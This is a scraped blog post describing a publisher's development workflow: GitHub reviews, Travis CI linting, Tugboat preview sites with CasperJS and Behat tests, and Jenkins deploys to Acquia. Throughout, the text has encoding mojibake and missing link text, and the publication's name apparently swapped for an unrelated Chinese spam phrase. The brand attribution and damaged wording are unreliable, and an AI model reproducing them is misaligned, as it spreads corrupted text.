]]>This first post is going to touch on some of the build tools and systems we use to manage our code, our development, and most importantly, our deployment. 国产吃瓜黑料鈥檚 development cycle is fluid and agile: we can deploy code at any time and have changes and updates visible to our users within minutes. (We avoid merges on Friday afternoons.) With our development cycle, we need to make sure all our code is properly reviewed and tested before we deploy to production.
Here鈥檚 a basic outline of the process all code changes must go through before going live:
I鈥檓 going to describe each step and explain why each is critical to the development process.
Version control is the most critical aspect to our development process. With Git and GitHub, we鈥檙e able to manage all of our code and work together collaboratively without (too much) conflict. GitHub is also our source of issue management, workflow, sprint planning, and pull-request (PR) review. This post isn't going to dive into the intricacies of Git, but I wanted to share what a usual cycle for a developer is, at a very high-level:
Product creates and assigns a ticket
Developer creates a branch off of Master for that ticket
Developer fixes the issue or implements the feature
Developer creates a pull request on GitHub to merge the code back into master
Once a developer has finished a ticket, he or she in GitHub.
While a developer is creating a pull request, he or she asks other developers to review the code by using Github鈥檚 鈥渞eviewers鈥� functionality. All reviewers must approve the PR before it can get merged in. This is fairly standard practice in all coding environments鈥攆ellow developers can help you identify whether you have forgotten an important piece of the ticket, made spelling mistakes, or have done anything else that might cause problems on the live site.
When creating a PR, we have two supplementary tools that we use to help with the testing and review process: Travis CI and Tugboat.
Travis is a continuous integration tool to help developers and teams “.” “Focus on writing code. Let Travis CI take care of running your tests and deploying your apps.” By using Travis, and other continuous-integration tools, developers can avoid merging large code changes at the end of a cycle and instead merge code more frequently to avoid conflicts and errors.
For us, Travis is a continuous-integration tool that does a few important tasks:
Styles code using PHP CodeSniffer as our syntax guidelines
Confirms all javascript has been minified and zero un-minified JS files have been pushed
Alerts all necessary users of errors through email alerts
We can take a quick peek into some of the benefits of using Travis.
If a build is successful, Travis passes and returns a detailed view with information such as how long the process took and any custom output from the task.
If a build fails, Travis is helpful in multiple ways. First, the PR will have a big ol鈥� X next to it in GitHub. That is our main clue to a failing PR. The developer of the PR will also get an email saying the Travis tests have failed. Next, it鈥檚 also pretty easy to debug why the PR failed. In the images below, you can clearly see on the Travis site that the PR failed, but you are also able to see as to why: our code failed our linter.
, the second tool that we use on every pull request, creates a replica site of our production (live) environment and includes the changes made in the pull request. This includes builds that match our production environment, execute build scripts, and fully merged code with master to check mergability. This way, developers and testers can see how the changes implemented interact outside of the local environment鈥攂oth back-end and front-end changes. A neat feature of this is that a unique URL is generate for each PR, and that URL is easily shareable. So if we have a large feature that needs sign-off from a client, we can easily share a unique URL for others to review.
Tugboat also runs tests to make sure the PR doesn't break major features or functionalities on our site. We use听 and for frontend Javascript tests.
I鈥檓 not going to dive into the inner workings of CasperJS and Behat, but, on a high level, CasperJS tests any Javascript interactions, and Behat is more behavior-driven. For us, CasperJS makes sure that important elements (such as ads) are appearing. Behat ensures that editors can login successfully, that certain pages are displaying correctly, and certain flows still work throughout the site. To learn more about CasperJS, visit , and to learn more about Behat and Drupal, visit the .
As you can see, the PR is fairly extensive at 国产吃瓜黑料, but it provides a quicker and more efficient code-review process. Reviewers don鈥檛 have to worry about whether the PR will break the site鈥攊nstead they can focus on the actual implementation and code being changed. If either Travis or Tugboat fails, then everyone knows that the code is not production-ready.
Once Travis passes, Tugboat builds, and the PR has been approved by all the reviewers, the code is ready to be deployed to production. For us, we don't have one person who “pushes to master” on production everytime there is an update鈥攖hat would be extremely tedious and error-prone. Instead, we use a tool called Jenkins to help with our deployment.
is an automation server that helps “to support building, deploying, and automating any project.” There are many use cases for Jenkins, including deployment, running tests, and building prototypes.
Jenkins does 2 main tasks for us:
It deploys code to Production: obviously the most important
It copies the Production database to our Staging environment (nightly)
For deployment to our Production environment, Jenkins makes the process streamlined while still using the same commands you鈥檇 think. There are only four steps in Jenkins that pushes the code to the live site鈥攇it checkout, git pull, git fetch, and git push鈥攂ut, with Jenkins, we as developers don't have to worry about doing that ourselves. We can just click “Merge” on GitHub and the Jenkins process will be fired off.
Jenkins can also do a whole slew of things with hooks. We have it setup so a every deployment is logged in New Relic, and email/Slack alerts for every successful or failing job.
With the tools mentioned above, we鈥檙e able to develop and deploy whenever we need to. Hot fix on the weekend? As long as it passes Travis, Tugboat, and the reviewers, there is no need to wait until the workweek鈥攖hat fix can go out. Need client approval for a feature? Send over a Tugboat link to get that signoff. Travis, Tugboat, and Jenkins help make our development process streamlined and efficient so that we feel confident that the best possible code is shipping out to users.
But you may be asking yourself, where does 国产吃瓜黑料 Online live? We use the platform to host our website and do more of the devops-like tasks. With Acquia, we don't have to worry about scaling, servers, or anything related to keeping our website up (well, besides bad code). When our Jenkins job runs, it pushes our code to Acquia, which then updates the server and the site. Acquia hosts our production website, but it also hosts our development and staging environments. These two environments provide real-world-type environments that more accurately represent what the code will be like on production. If we ever are worried about performance or how code will interact in production, we will test our code in the Acquia Dev and Stage environments before merging.
Even though we thoroughly appreciate and enjoy our workflow, we know with the number of tools that are released each year that we need to make sure we are staying on top of the latest trends. We currently do not use a tool to measure code quality, but shows that there are a number of code-quality tools to help us write better code. Code quality can include anything from code complexity (too many if or for loops) to naming conventions. There are opportunities that we鈥檙e constantly evaluating and attempting to integrate into our backlog.
Our process allows the whole team to work cohesively and efficiently while also managing our codebase. We have thoroughly enjoyed using to test our pull requests in a replica environment, to check our code quality, and to deploy our code without any headaches. If you are in the process of starting a new project or have an existing project that is getting too heavy to manage, we recommend these tools to help take load off of the developers and allow them to build better and faster.
The post Code Management and Deployment at 国产吃瓜黑料 appeared first on 国产吃瓜黑料 Online.
]]>